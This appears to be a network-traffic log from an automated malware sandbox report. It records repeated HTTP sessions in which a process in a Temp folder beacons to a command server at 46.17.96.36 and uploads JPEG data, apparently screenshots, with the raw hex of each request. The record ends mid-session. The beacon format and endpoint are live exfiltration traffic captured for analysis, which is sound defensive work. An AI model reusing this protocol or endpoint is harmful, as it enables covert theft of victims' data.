                                        Aug 29, 2021 22:29:03.941772938 CEST18079OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:29:03.941828012 CEST18097OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:29:03.941960096 CEST18108OUTData Raw: 69 5a 00 c5 3b 14 98 a2 c3 b8 a2 97 14 0a 76 29 89 88 29 71 cd 18 a7 77 a6 48 80 53 80 cd 25 38 55 22 58 84 52 62 9e 45 25 0c 06 e2 96 97 14 b8 a6 02 01 4e 14 01 4b 40 98 52 1a 75 03 93 4c 40 a2 a4 51 4d a9 07 02 ad 22 1b 1a d4 ca 94 8e 2a 32 28
                                        Data Ascii: iZ;v))qwHS%8U"XRbE%NK@RuL@QM"*2(` RB(R<V4Q@$QNHD)jKERJM6u cih)i)GZsKLAP(:)ANpLuE!1hP#c6z7s5Q}Ma
                                        Aug 29, 2021 22:29:04.045548916 CEST18144INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.44973846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:09.342900991 CEST1066OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----699541f833ca8faa1bd26fe17facb267
                                        Host: 46.17.96.36
                                        Content-Length: 107110
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:09.342928886 CEST1066OUTData Raw: 2d 2d 2d 2d 2d 2d 36 39 39 35 34 31 66 38 33 33 63 61 38 66 61 61 31 62 64 32 36 66 65 31 37 66 61 63 62 32 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------699541f833ca8faa1bd26fe17facb267Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:09.342988968 CEST1076OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:09.343051910 CEST1079OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:09.378416061 CEST1084OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:09.378479004 CEST1087OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:09.378663063 CEST1090OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:09.378770113 CEST1098OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:09.378873110 CEST1099OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:27:09.379040003 CEST1104OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:09.413585901 CEST1201OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:09.524126053 CEST1448INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        30192.168.2.44976546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:23.817351103 CEST4257OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:23.817470074 CEST4258OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:23.817641973 CEST4268OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:23.817718983 CEST4270OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:23.853312969 CEST4276OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:23.853751898 CEST4279OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:23.853971004 CEST4296OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:23.892798901 CEST4298OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:23.893121958 CEST4301OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:23.893268108 CEST4304OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:23.893659115 CEST4307OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:24.002857924 CEST4365INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        300192.168.2.45003946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:04.018115997 CEST18144OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:04.115389109 CEST18145INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        301192.168.2.45004046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:04.296751976 CEST18145OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:04.366585016 CEST18146INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        302192.168.2.45004146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:04.395787001 CEST18146OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----cc6e581ce94a2c7e20266147ae0a1079
                                        Host: 46.17.96.36
                                        Content-Length: 111522
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:04.395872116 CEST18146OUTData Raw: 2d 2d 2d 2d 2d 2d 63 63 36 65 35 38 31 63 65 39 34 61 32 63 37 65 32 30 32 36 36 31 34 37 61 65 30 61 31 30 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------cc6e581ce94a2c7e20266147ae0a1079Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:04.396039963 CEST18156OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:04.396184921 CEST18159OUTData Raw: 00 3f b3 ff 00 df 29 ff 00 c4 d0 05 8a 2a bf d9 a5 ff 00 9f d9 ff 00 ef 94 ff 00 e2 69 05 b4 bf f3 fb 3f fd f2 9f fc 4d 00 59 a4 aa e6 da 5f f9 fd 9f fe f9 4f fe 26 83 6d 2f fc fe cf ff 00 7c a7 ff 00 13 40 16 28 aa ff 00 66 97 fe 7f 67 ff 00 be
                                        Data Ascii: ?)*i?MY_O&m/|@(fgS4X/7Ekd.?@)q\/RbRLSF)1E;QK1EqF))&(-%7b`%R7ZZ1HchR,A
                                        Aug 29, 2021 22:29:04.431447029 CEST18162OUTData Raw: 90 78 3d 3b fd 6a dd bf 8a 3c 25 ac dc 8d 2c 08 5f cc 3b 11 65 b7 c2 39 ec 06 47 e5 54 b0 f0 8d d3 4e 4d 6f 6d 97 e0 ff 00 43 27 88 9c ac d3 51 4f 6b ee ff 00 15 fa 9a 92 c7 73 70 d7 0f 6b 0d a5 d5 a5 c9 0e 19 a7 c0 61 b1 57 b2 90 47 1e b5 f3 47
                                        Data Ascii: x=;j<%,_;e9GTNMomC'QOkspkaWGG1^5TxVzVDzv;czz%_JT3OjGQEQE|;a;o5m}}_o<UVg)uI@*5]x[u
                                        Aug 29, 2021 22:29:04.431521893 CEST18167OUTData Raw: 67 e0 7b eb 59 fc 3b 73 75 a8 ea 77 76 52 4f a9 4f 27 fa 3b b0 de 4a 44 4e 70 0f 4c fe b5 d1 fd ab 44 ff 00 a1 9b 57 ff 00 bf 8f ff 00 c4 56 1f c2 df ed 3f f8 44 66 fe ce fb 27 fc 7f c9 e6 7d a3 77 fc f3 8f 18 db f8 d7 6b ff 00 15 37 fd 42 3f f2
                                        Data Ascii: g{Y;suwvROO';JDNpLDWV?Df'}wk7B?%y#U_xz4?|_^OOhA_'w~^fe_tQEtQ@%PRS(J3@QH)h(4v!M3M\,k;3Lgn8
                                        Aug 29, 2021 22:29:04.431730032 CEST18178OUTData Raw: 59 03 75 ad a6 b9 a3 63 18 bb 3b 9d ae a3 a2 eb 7a cc 5a 24 5e 1b fb 4e a9 05 98 78 4c b6 24 b8 4b af 39 f7 48 e4 7d c2 c3 cb 60 ed 8c 8c 73 f2 f1 d0 9b fd 33 ed 50 5c 21 61 75 ff 00 09 1d c1 b2 9e 39 42 c0 2e 84 30 f3 20 c6 5a 36 97 a9 0c bc 1c
                                        Data Ascii: Yuc;zZ$^NxL$K9H}`s3P\!au9B.0 Z6\2S\jWMu]]0Ms]3eV=5;{#{[M@l.L4O/|#}i`M$@O}1RP2NuJ&TK
                                        Aug 29, 2021 22:29:04.431901932 CEST18179OUTData Raw: 42 47 d4 45 bc 4a 8a d6 e6 3f 37 3c 74 ff 00 55 28 1d 86 e0 06 06 05 3a 23 6d fd 87 1e be 34 eb 26 ba 8b 4a 6b 95 80 c0 3c af 31 ef a4 8f 7b 26 30 c1 14 80 01 e3 85 c8 20 62 b9 b5 d5 f5 48 ce a0 63 bc 31 ff 00 68 c7 e5 5d 2a 22 aa c8 99 07 6e 00
                                        Data Ascii: BGEJ?7<tU(:#m4&Jk<1{&0 bHc1h]*"n1:qIkvRow5JcVS33#)u%*QiF^Y-k}mc9mEmF$HcI'uPq s=IuR!ImXq9T#LErvnVu
                                        Aug 29, 2021 22:29:04.431946039 CEST18185OUTData Raw: 85 2b 37 03 45 32 93 47 51 b4 75 79 92 a2 31 d6 4e 99 a4 6a 14 4a 53 19 2a e9 8e a2 68 eb 37 03 68 d4 29 95 a6 11 56 59 6a 32 b5 8c a2 6a a4 42 45 26 2a 52 b4 c2 2a 1a 2d 31 94 62 97 14 62 a6 c5 0d c5 28 14 62 96 8b 00 86 9b de 9d 8a 4c 73 40 15
                                        Data Ascii: +7E2GQuy1NjJS*h7h)VYj2jBE&*R*-1bb(bLs@Ke8V&Bz$Mw%>[Ks4nh_d$)*V5uRv2F17XM8oLm4G{}It=[k/ewl:sO\3$p
                                        Aug 29, 2021 22:29:04.467305899 CEST18187OUTData Raw: 04 8b db 34 72 b1 f3 a6 45 8a 50 29 db 48 ea 0f e5 45 16 15 c4 02 96 94 52 81 4c 42 62 97 14 b4 b8 a7 62 6e 20 14 b8 a5 a5 02 aa c2 b8 52 d1 4b 8a 62 12 9c 28 c5 38 0a 68 96 c2 96 8c 52 81 4c 90 02 9d 48 05 38 53 13 0a 31 4e c5 18 a6 48 94 a2 92
                                        Data Ascii: 4rEP)HERLBbbn RKb(8hRLH8S1NHh@R3@X4y(4sJ;NJ\Kjxz\K!zxzFnPINI'Q]iJTGj/r-XP~M\0SOW:-_YR0[{
                                        Aug 29, 2021 22:29:04.467364073 CEST18198OUTData Raw: a0 d6 8f 5b 7e 9f e6 72 87 42 bf 36 53 df 47 0a fd 95 1a 42 9b e7 8d 64 74 46 da 59 63 24 3b 28 39 cb 2a 90 30 7d 0e 33 6b a1 6f 18 dc 5c 78 6d 74 89 c6 ab 08 8d 66 8d 3e c7 a9 98 a0 75 77 2f 89 61 d8 43 90 58 8c 82 b9 18 07 a6 6b 9d 1d 2b 4a 2e
                                        Data Ascii: [~rB6SGBdtFYc$;(9*0}3ko\xmtf>uw/aCXk+J.m{VPOE-lbthr202B~Pz5,cG_,B@KtOQ&HS$c[wv&Qhax`1c6yU=6oI_
                                        Aug 29, 2021 22:29:04.577579021 CEST18260INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        303192.168.2.45004246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:04.552432060 CEST18259OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:04.623897076 CEST18260INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        304192.168.2.45004346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:04.848567963 CEST18261OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
